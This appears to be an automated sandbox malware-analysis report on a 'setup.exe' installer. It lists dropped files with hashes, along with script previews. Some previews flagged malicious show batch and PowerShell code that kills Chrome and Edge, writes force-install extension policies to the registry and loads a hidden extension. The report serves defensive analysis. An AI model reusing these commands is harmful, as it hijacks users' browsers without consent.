                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1484
                                                                                                                                                                            Entropy (8bit):5.512204948904614
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:SqxzDt+6Oooo4uuuuuu0oooqFUSUSUSUtUSUSUSUgyNDpOpOpOpOpOpOpOpOpOpF:SqxPZOooo4uuuuuu0oooqFUSUSUSUtUI
                                                                                                                                                                            MD5:216E32733B99D128BA7B1DE8748A5D12
                                                                                                                                                                            SHA1:2B857CB52CE605E9B8470683468BF331A86A042D
                                                                                                                                                                            SHA-256:F856A6E498EF981476B85590200B3CBA06B04C80329B434C1A3F89BA7C7240A3
                                                                                                                                                                            SHA-512:3CE39384E4E0138FCF1048819543BA6C6353AE32B597D64C06024F7BF63901D69D23ECF07FD6F754C56E5115A4DCABDB680BD98DF86DB5D8C729552F80BE9D37
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 27 x 17 x 24, image size 1430, resolution 3778 x 3778 px/m, cbSize 1484, bits offset 54
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1484
                                                                                                                                                                            Entropy (8bit):5.514249773809233
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:mtOsjeMzM3cb//////2S3YlOuuuuuuPqVKT+E2eOOO1OOOvSvfTQvJBH8eZ:MMW3IOuuuuuuCVs+2OOO1OOOvSHT2T5Z
                                                                                                                                                                            MD5:EEDA62BE091F6EF68D9BA7D76C9CFD84
                                                                                                                                                                            SHA1:822372B556A550DD93F931B1D115C888D611FD20
                                                                                                                                                                            SHA-256:3C746AD942BDD0A9B95414F80CD0E20C32251601A9D579BBDFDAB6C9AD7414F8
                                                                                                                                                                            SHA-512:EE394717A1191ED3556FF9359D35861A475A96A14E4026F304D42156E357EC564522333EA745E90BFDCD2EE1A85A01316999EF9B601BDAC47B6ED7015F0C8E14
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 1 x 200 x 24, cbSize 854, bits offset 54
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):854
                                                                                                                                                                            Entropy (8bit):3.802531598764924
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:kUGGGGGGGGjg/QUVdLbCKKKKKKWqqqqqqr:kGUVdnCKKKKKKWqqqqqqr
                                                                                                                                                                            MD5:4C3DDA35E23D44E273D82F7F4C38470A
                                                                                                                                                                            SHA1:B62BC59F3EED29D3509C7908DA72041BD9495178
                                                                                                                                                                            SHA-256:E728F79439E07DF1AFBCF03E8788FA0B8B08CF459DB31FC8568BC511BF799537
                                                                                                                                                                            SHA-512:AB27A59ECCDCAAB420B6E498F43FDFE857645E5DA8E88D3CFD0E12FE96B3BB8A5285515688C7EEC838BBE6C2A40EA7742A9763CF5438D740756905515D9B0CC5
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):217920
                                                                                                                                                                            Entropy (8bit):6.659990688109136
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3072:s3mBJDmU1w79thLwNj3xrvkLzDSpjqBIe2c8AOAg0FuDGMxwVb7zY2+fS4P:s3MN9WmHcLz+pjqgAOSMmEfSC
                                                                                                                                                                            MD5:AE9AA65470306DB7DB02371779BBCE64
                                                                                                                                                                            SHA1:6580975408BC4013A5E7A3E717912B30B1CB6294
                                                                                                                                                                            SHA-256:FB7B23455C1BE134A4F89824F1CE45EF7D09A25188B6C726ADA9690C9B28EF33
                                                                                                                                                                            SHA-512:DB36D383DED9DA8C5B0BE211CB3C816787629993015763A5A19067BC86351C65CC4A9ED149416DF47D3DE02EA3CC35803862EA029FBD5059B1633A2630F7A769
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):441824
                                                                                                                                                                            Entropy (8bit):6.594608504548659
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12288:51biQnSDqYisDEiD3jbTFiuiSiO+SP533UNlQc:vbvnSDqJsDEiD3PTFTFiM5HUNWc
                                                                                                                                                                            MD5:CE5086726084A4E17F01D9C2F04CDBC3
                                                                                                                                                                            SHA1:CCD01B0565E823C7462EA18B5CA85F3882824996
                                                                                                                                                                            SHA-256:72A27F07BE89F5E42F2E80B2FE94EB96C6CCE19E22524D087CA947AC53E1A021
                                                                                                                                                                            SHA-512:ECF7B3EA73BCD37115CA08226E07D0E3FE512F350CE874E2736BF41817411B5838BB2A4C94770D43E94B3401FD042006A7036CD2DF40CF95F7E95A3EABA27764
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):602432
                                                                                                                                                                            Entropy (8bit):6.469756311917561
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6144:2aFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl4mN9ysU5p/s8g73W:jYL9HXVW0xOA+KlZC4v65ps8g73W
                                                                                                                                                                            MD5:FE647318C4CC7F18012BDF5F8F96C468
                                                                                                                                                                            SHA1:82E516C4247CA5EAC3365BF80120D8A1F30E3042
                                                                                                                                                                            SHA-256:AEC9F4CB37604C67C69FC0FEE1DC630DB016E1471212006ED787DD9432158E69
                                                                                                                                                                            SHA-512:2AB40A563FA4AFE48BA74067653A244BDD53F9C04CD3764F29C5F80349F68B2126C6442E0A75FFB3C207F8C9267D4FAE7B407CA7D1D5E31D729B84B0EDEA817C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):602432
                                                                                                                                                                            Entropy (8bit):6.469756311917561
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6144:2aFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl4mN9ysU5p/s8g73W:jYL9HXVW0xOA+KlZC4v65ps8g73W
                                                                                                                                                                            MD5:FE647318C4CC7F18012BDF5F8F96C468
                                                                                                                                                                            SHA1:82E516C4247CA5EAC3365BF80120D8A1F30E3042
                                                                                                                                                                            SHA-256:AEC9F4CB37604C67C69FC0FEE1DC630DB016E1471212006ED787DD9432158E69
                                                                                                                                                                            SHA-512:2AB40A563FA4AFE48BA74067653A244BDD53F9C04CD3764F29C5F80349F68B2126C6442E0A75FFB3C207F8C9267D4FAE7B407CA7D1D5E31D729B84B0EDEA817C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1126208
                                                                                                                                                                            Entropy (8bit):6.47558339310688
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24576:+BbmgYewSBprKpygTqkg0z/f2sbQEiwiUt5GFD5IqQc3w0RZqTkqMUM0zVQZv:+BflKp/Dz/f2sbQEidUt5Gp5xz3w0RZP
                                                                                                                                                                            MD5:C519803F83155AE74401C90F1F6AD5B1
                                                                                                                                                                            SHA1:5D7DF65F700D0303B924B08F576921CA60479374
                                                                                                                                                                            SHA-256:14C4DECB2BF71C253AECB0C36A768A1CF202F93C1769265C2819D9FF4BC2B349
                                                                                                                                                                            SHA-512:879251E3A07316869F92E1E0F945399BD1C5B451B014C88299076FAA34B7745F5191DB20016EA860EC5FD4756CF99DB9A94DD87C6D710DD609ACC19D88736190
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):602432
                                                                                                                                                                            Entropy (8bit):6.469756311917561
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6144:2aFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl4mN9ysU5p/s8g73W:jYL9HXVW0xOA+KlZC4v65ps8g73W
                                                                                                                                                                            MD5:FE647318C4CC7F18012BDF5F8F96C468
                                                                                                                                                                            SHA1:82E516C4247CA5EAC3365BF80120D8A1F30E3042
                                                                                                                                                                            SHA-256:AEC9F4CB37604C67C69FC0FEE1DC630DB016E1471212006ED787DD9432158E69
                                                                                                                                                                            SHA-512:2AB40A563FA4AFE48BA74067653A244BDD53F9C04CD3764F29C5F80349F68B2126C6442E0A75FFB3C207F8C9267D4FAE7B407CA7D1D5E31D729B84B0EDEA817C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1126208
                                                                                                                                                                            Entropy (8bit):6.47558339310688
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24576:+BbmgYewSBprKpygTqkg0z/f2sbQEiwiUt5GFD5IqQc3w0RZqTkqMUM0zVQZv:+BflKp/Dz/f2sbQEidUt5Gp5xz3w0RZP
                                                                                                                                                                            MD5:C519803F83155AE74401C90F1F6AD5B1
                                                                                                                                                                            SHA1:5D7DF65F700D0303B924B08F576921CA60479374
                                                                                                                                                                            SHA-256:14C4DECB2BF71C253AECB0C36A768A1CF202F93C1769265C2819D9FF4BC2B349
                                                                                                                                                                            SHA-512:879251E3A07316869F92E1E0F945399BD1C5B451B014C88299076FAA34B7745F5191DB20016EA860EC5FD4756CF99DB9A94DD87C6D710DD609ACC19D88736190
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):602432
                                                                                                                                                                            Entropy (8bit):6.469756311917561
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6144:2aFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl4mN9ysU5p/s8g73W:jYL9HXVW0xOA+KlZC4v65ps8g73W
                                                                                                                                                                            MD5:FE647318C4CC7F18012BDF5F8F96C468
                                                                                                                                                                            SHA1:82E516C4247CA5EAC3365BF80120D8A1F30E3042
                                                                                                                                                                            SHA-256:AEC9F4CB37604C67C69FC0FEE1DC630DB016E1471212006ED787DD9432158E69
                                                                                                                                                                            SHA-512:2AB40A563FA4AFE48BA74067653A244BDD53F9C04CD3764F29C5F80349F68B2126C6442E0A75FFB3C207F8C9267D4FAE7B407CA7D1D5E31D729B84B0EDEA817C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):217920
                                                                                                                                                                            Entropy (8bit):6.659990688109136
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3072:s3mBJDmU1w79thLwNj3xrvkLzDSpjqBIe2c8AOAg0FuDGMxwVb7zY2+fS4P:s3MN9WmHcLz+pjqgAOSMmEfSC
                                                                                                                                                                            MD5:AE9AA65470306DB7DB02371779BBCE64
                                                                                                                                                                            SHA1:6580975408BC4013A5E7A3E717912B30B1CB6294
                                                                                                                                                                            SHA-256:FB7B23455C1BE134A4F89824F1CE45EF7D09A25188B6C726ADA9690C9B28EF33
                                                                                                                                                                            SHA-512:DB36D383DED9DA8C5B0BE211CB3C816787629993015763A5A19067BC86351C65CC4A9ED149416DF47D3DE02EA3CC35803862EA029FBD5059B1633A2630F7A769
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:modified
                                                                                                                                                                            Size (bytes):602432
                                                                                                                                                                            Entropy (8bit):6.469756311917561
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6144:2aFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl4mN9ysU5p/s8g73W:jYL9HXVW0xOA+KlZC4v65ps8g73W
                                                                                                                                                                            MD5:FE647318C4CC7F18012BDF5F8F96C468
                                                                                                                                                                            SHA1:82E516C4247CA5EAC3365BF80120D8A1F30E3042
                                                                                                                                                                            SHA-256:AEC9F4CB37604C67C69FC0FEE1DC630DB016E1471212006ED787DD9432158E69
                                                                                                                                                                            SHA-512:2AB40A563FA4AFE48BA74067653A244BDD53F9C04CD3764F29C5F80349F68B2126C6442E0A75FFB3C207F8C9267D4FAE7B407CA7D1D5E31D729B84B0EDEA817C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):448
                                                                                                                                                                            Entropy (8bit):5.019637372140489
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:XjmBuit97lHl+fvEMmtcEE34+es1phk0/U:XBi/xl+fcMmGDis1M0c
                                                                                                                                                                            MD5:633C65BBEF12B7AD8D062A6DFC25CAF1
                                                                                                                                                                            SHA1:5D3E6E2879DF92D7694D954F162C27F9C80FA8EF
                                                                                                                                                                            SHA-256:E2318AD10C49834F45119B2231E38F34A4AD840BE94B5F212DA9C2BE7939759F
                                                                                                                                                                            SHA-512:D959954D0DAFC6EEAF150924CA71B007AFDCFAE04427EB37E2EE3C13ED443673CCC9DEC2BB5F4D2A6851925BA9D1E2DF71778021E873139DC4EA196E9A4DF399
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:Stop-Process : Cannot find a process with the name "msedge". Verify the process name and call the cmdlet again...At C:\Users\user\AppData\Local\Temp\scr1333.ps1:1 char:1..+ Stop-Process -Name 'msedge';..+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : ObjectNotFound: (msedge:String) [Stop-Process], ProcessCommandException.. + FullyQualifiedErrorId : NoProcessFoundForGivenName,Microsoft.PowerShell.Commands.StopProcessCommand.. ..
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):448
                                                                                                                                                                            Entropy (8bit):5.006179910732363
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:XjmBut97lHl+fF9EMRmCFtEE34+es1phk0/U:XB/xl+fFmM9LDis1M0c
                                                                                                                                                                            MD5:DF280E3DFC798D9DEEA723A64D15DA99
                                                                                                                                                                            SHA1:654AB86BF7EA34A7DA25DD81F1FF52D0A12146E2
                                                                                                                                                                            SHA-256:D0CF9A48E490820718FE56224243AE8CCB8294850E04CA7C89480A12C3183F64
                                                                                                                                                                            SHA-512:FE2F13DB2A957B639A5A4B12B77E035A7426099716B90F93A330924BCA3C3829C2F023807037FF49C2247C3A06499D8FD2A354930806D46DD5F8FDE03C9CD51B
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:Stop-Process : Cannot find a process with the name "chrome". Verify the process name and call the cmdlet again...At C:\Users\user\AppData\Local\Temp\scrECF8.ps1:1 char:1..+ Stop-Process -Name 'chrome';..+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : ObjectNotFound: (chrome:String) [Stop-Process], ProcessCommandException.. + FullyQualifiedErrorId : NoProcessFoundForGivenName,Microsoft.PowerShell.Commands.StopProcessCommand.. ..
                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):954
                                                                                                                                                                            Entropy (8bit):5.163742020740791
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:W46X7oejIT3IUgHI7wjITCIUXHI7OTsuJl821ESJF8svv:W46kejumawjftatshvF8s3
                                                                                                                                                                            MD5:4588743DA052A1FEA1239A511BB364FF
                                                                                                                                                                            SHA1:3D1787890905D230DE092047E2A6292398CCB440
                                                                                                                                                                            SHA-256:CE9ED72627102152193DB5F4A4D7AAFFA6656BC9F9BA0357DAF3AA3F841F8280
                                                                                                                                                                            SHA-512:92C4E084358D29EEE3359C6C3A56DEAF608B2FD968EA1212E3C56A8A6B24814DF104B00A3EC9722D1BFE1EBDA7184272D15E1E473195229C25F021144926AC6C
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Preview:call "%~dp0\config.bat"....set app=Google\Chrome..set ext="%LocalAppdata%\%app%\%ext_dir%\%id%\%version%_0\"....set chrome_exe=%systemdrive%\Program Files\%app%\Application\chrome.exe....if exist "%chrome_exe%" (...REG ADD "%base32%\Policies\%app%\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d %id% /f...REG ADD "%base32%\%app%\Extensions\%id%" /v "path" /t REG_SZ /d %file% /f...REG ADD "%base32%\%app%\Extensions\%id%" /v "version" /t REG_SZ /d %version% /f.....REG ADD "%base64%\Policies\%app%\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d %id% /f...REG ADD "%base64%\%app%\Extensions\%id%" /v "path" /t REG_SZ /d %file% /f...REG ADD "%base64%\%app%\Extensions\%id%" /v "version" /t REG_SZ /d %version% /f.....start "" "%chrome_exe%" --profile-directory="Default" --no-startup-window --load-extension="%systemdrive%\apps-helper".....for /l %%x in (1, 1, 20) do (....if not exist %ext% (timeout 2 > NUL) else (echo "Wait")...)..)....timeout 5 > NUL..
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):834
                                                                                                                                                                            Entropy (8bit):5.119306354744483
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:/q46XDjI0IuHI7LjIpIxHI7DRJl821ESMLHv:/q46zjzraLj+8a1hqLP
                                                                                                                                                                            MD5:6F5A4776CE5D10F58012519F76D3DD40
                                                                                                                                                                            SHA1:A48376DEC74A2D9C469B5D18156BE7E98AFB810C
                                                                                                                                                                            SHA-256:A144A36CE818D5C33BD5959D008DEA20E2736B87A1874015A560F4D9B85E9741
                                                                                                                                                                            SHA-512:255DEC451AF4CF5E946589BE5834506A60B89ED8703F1013A14B933915955579B9CC0A755C553DB2EB042E1A68AC9AC27E6F6A53DEAA8F6ADC7FD636B3E70D81
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:call "%~dp0\config.bat"....set app=Microsoft\Edge..set ext="%LocalAppdata%\%app%\%ext_dir%\%id%\%version%_0\"....REG ADD "%base32%\Policies\%app%\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d %id% /f..REG ADD "%base32%\%app%\Extensions\%id%" /v "path" /t REG_SZ /d %file% /f..REG ADD "%base32%\%app%\Extensions\%id%" /v "version" /t REG_SZ /d %version% /f....REG ADD "%base64%\Policies\%app%\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d %id% /f..REG ADD "%base64%\%app%\Extensions\%id%" /v "path" /t REG_SZ /d %file% /f..REG ADD "%base64%\%app%\Extensions\%id%" /v "version" /t REG_SZ /d %version% /f....start "" "msedge" --profile-directory="Default" --no-startup-window --load-extension="%systemdrive%\apps-helper"....for /l %%x in (1, 1, 20) do (...if not exist %ext% (timeout 2 > NUL) else (echo "Wait")..)....timeout 5 > NUL..
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):450
                                                                                                                                                                            Entropy (8bit):5.035914589492242
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:f8F2Axuq3oidDQkuq3oidDx1G3oidDQkG3oid6:o43Ie3IXITI6
                                                                                                                                                                            MD5:E9224949C67BE20C5129A39BE0B97A99
                                                                                                                                                                            SHA1:116F2D25F2FBDDE03C086499DEC92A17CC972198
                                                                                                                                                                            SHA-256:D553F8DFBF7D04E9C17C7416E3C387BC2BAD4F7C030EB25E2FE2AF0C610840DB
                                                                                                                                                                            SHA-512:AF05AF92488983B88E5D0C5D9D71AC918499010F8A87523F3AA530B695EA96168B81633D4BE39D7C91D15C8C99D2BB7DF795179D79C11F11466255A00D9EF28C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:call "%~dp0\config.bat"....set chrome=Google\Chrome..set msedge=Microsoft\Edge....REG ADD "%base32%\Policies\%chrome%\ExtensionInstallForcelist" /v "1" /t REG_SZ /d %id% /f..REG ADD "%base64%\Policies\%chrome%\ExtensionInstallForcelist" /v "1" /t REG_SZ /d %id% /f....REG ADD "%base32%\Policies\%msedge%\ExtensionInstallForcelist" /v "1" /t REG_SZ /d %id% /f..REG ADD "%base64%\Policies\%msedge%\ExtensionInstallForcelist" /v "1" /t REG_SZ /d %id% /f
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):41576
                                                                                                                                                                            Entropy (8bit):4.059442483069048
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:5WbLVyvvo51AbfOcQ8k1jauBugqlgVOWvjJudHaUtlGZ:20g8TmFplQS/Nyo
                                                                                                                                                                            MD5:318785524FC17E0B068194A184F5F16A
                                                                                                                                                                            SHA1:0776A64C20825EA71498B1CB3D02B71DA01EF2FA
                                                                                                                                                                            SHA-256:2C9001B038547856DB0929D5F4F452F35798F9F9DB5B3D6801E2EA97D80CC36A
                                                                                                                                                                            SHA-512:E8DC746656C43DCFC0377587EC8164E2D7676AB699DB74CEA561A1A2593EAABBA61AB9745B2FACA3276E3A236A99E220B6375CD9A835C409239949E5B2CC2837
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:param(..  [alias("propFile")]      [Parameter(Mandatory=$true)] [string] $msiPropOutFilePath.. ,[alias("propSep")]       [Parameter(Mandatory=$true)] [string] $msiPropKVSeparator.. ,[alias("lineSep")]       [Parameter(Mandatory=$true)] [string] $msiPropLineSeparator.. ,[alias("scriptFile")]    [Parameter(Mandatory=$true)] [string] $userScriptFilePath.. ,[alias("scriptArgsFile")][Parameter(Mandatory=$false)][string] $userScriptArgsFilePath.. ,[Parameter(Mandatory=$true)]
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):41576
                                                                                                                                                                            Entropy (8bit):4.059331023443082
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:5WbLVyvvo51AbfOcQ8k1jauBugqlgV4WvjJudHaUtlGGVo:20g8TmFplQSJNy5o
                                                                                                                                                                            MD5:C4F8384C5715DF5B6CFAFE90074667AB
                                                                                                                                                                            SHA1:0D0031C6BB596903C9E639B02D9E26126320DC4F
                                                                                                                                                                            SHA-256:032093F045E28B9069556255FAC3B15124226890EC6D92AAC6BBD0AD4E4117F3
                                                                                                                                                                            SHA-512:AAF4B13DEC53C74AF55C451D1EADF3775CB31533D9AA34EE9852CF2FB8280FCA708E3E316181B918ECBB15D9061EEDB52E9DEE21755885A8A365F4F0861C34D1
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Preview:param(..  [alias("propFile")]      [Parameter(Mandatory=$true)] [string] $msiPropOutFilePath.. ,[alias("propSep")]       [Parameter(Mandatory=$true)] [string] $msiPropKVSeparator.. ,[alias("lineSep")]       [Parameter(Mandatory=$true)] [string] $msiPropLineSeparator.. ,[alias("scriptFile")]    [Parameter(Mandatory=$true)] [string] $userScriptFilePath.. ,[alias("scriptArgsFile")][Parameter(Mandatory=$false)][string] $userScriptArgsFilePath.. ,[Parameter(Mandatory=$true)]
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):34966
                                                                                                                                                                            Entropy (8bit):4.012086952694085
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:Wo51AbfOcQ8k1jauBuAFXTsXBcNssJGZqZ/lo:F8TmFp1FXksDNo
                                                                                                                                                                            MD5:6F892EAF9EFFB6F18FB5257A14B7DED3
                                                                                                                                                                            SHA1:4CC7DEBDE228DFCE04168B92111A5B9C610E1E67
                                                                                                                                                                            SHA-256:7ABC5EB0930087DF17AD7DFA4915F116C7C70BEA4F63222AF096B7EA7D8730AC
                                                                                                                                                                            SHA-512:37824C4CA30B2B02B1C973912A2BD596FA0BF4DAB34270CC33129F9AFA853B725729622DECF0B96460ACF0CD5975E70ABCB0A8828C05071B29BFB7BA62707ED0
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:Stop-Process -Name 'msedge';..# SIG # Begin signature block
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):34966
                                                                                                                                                                            Entropy (8bit):4.011720633275862
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:mo51AbfOcQ8k1jauBuT4WvjJudHaUtlGCm:V8TmFpyNyvm
                                                                                                                                                                            MD5:DDAD32F3A446F9322407EB5E73C68E97
                                                                                                                                                                            SHA1:D59D11FE20053B58831C2E255E1077DDC635BCA6
                                                                                                                                                                            SHA-256:CCF08E7D01C0AE0A7D2BDEAB343443F41E9CD51E40450B6B4CE182F256C0116C
                                                                                                                                                                            SHA-512:09778E766B1A15E6C5F0D117B06FA07CC7B8FD2E632FA69D7AFA487D9A930D2F1B5D7BD3E585EFF79BBCE77377C854C435C7A418910D5A958FE9E204612AB688
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Preview:Stop-Process -Name 'chrome'; # SIG # Begin signature block
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):5038592
                                                                                                                                                                            Entropy (8bit):6.043058205786219
                                                                                                                                                                            Encrypted:false
